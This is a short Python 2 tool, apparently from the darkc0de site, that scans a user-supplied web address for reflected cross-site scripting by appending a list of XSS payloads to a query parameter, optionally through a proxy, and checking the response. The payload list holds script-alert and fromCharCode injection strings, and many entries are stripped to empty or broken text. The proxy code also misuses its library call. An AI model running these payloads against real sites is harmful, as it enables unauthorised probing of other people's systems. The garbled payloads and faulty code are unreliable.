#!/usr/bin/python #Checks host against xss payloads by searching source #for XSS. (simple) #Ver 1.1: Added Proxy Support #http://www.darkc0de.com #d3hydr8[at]gmail[dot]com import sys, urllib2, re, time, httplib, socket xss_ploads = ["%22%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E", "';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->\">'>", "'';!--\"=&{()}", "

", "

", "

", "

", "

", "\">", "

", "

", "

", "

", "

", "

", "perl -e 'print \"

\";' > out", "perl -e 'print \"alert(\"XSS\")\";' > out", "

", "", "<", "

a=/XSS/ alert(a.source)", "\";alert('XSS');//", "", "", "", "", "", "", "", "
", "", "

XSS", "

", "", "", "", "", "", "

", "

", "

", "

", "", "", "", "", "", "alert(\"XSS\")'); ?>", "XSS", "XSS"] def xss(payload): print "Testing:",payload #Comment out if needed try: if proxy != 0: proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'}) opener = urllib2.build_opener("http://"+host+payload, proxy_handler) source = opener.open("http://"+host+payload).read() else: source = urllib2.urlopen("http://"+host+payload).read() print "Source Length:",len(source) #Comment out if needed if re.search("xss", source.lower()) != None: print "\n[!] XSS:",host+payload,"\n" else: print "[-] Not Vuln." except(urllib2.HTTPError), msg: print "[-] Error:",msg pass print "\nd3hydr8[at]gmail[dot]com XSStest v1.1" print "---------------------------------------" if len(sys.argv) not in [2,4]: print "\nUsage: ./xsstest.py " print "\t[options]" print "\t -p/-proxy : Add proxy support" print "ex: ./xsstest.py www.example.com/index.php?page= 20.15.4.76:3128\n" sys.exit(1) host = sys.argv[1].replace("http://","") if host[-1:] != "=": print "\n[-] Host should end with a \'=\'\n" sys.exit(1) try: if sys.argv[3]: proxy = sys.argv[3] print "\n[+] Testing Proxy..." h2 = httplib.HTTPConnection(proxy) h2.connect() print "[+] Proxy:",proxy except(socket.timeout): print "\n[-] Proxy Timed Out" proxy = 0 pass except(NameError): print "\n[-] Proxy Not Given" proxy = 0 pass except: print "\n[-] Proxy Failed" proxy = 0 pass print "\n[+] Scanning:",host print "[+] Loaded:",len(xss_ploads),"payloads\n" for payload in xss_ploads: time.sleep(5) #Change this in seconds, if needed xss(payload.replace("\n","")) print "\n[+] Done\n"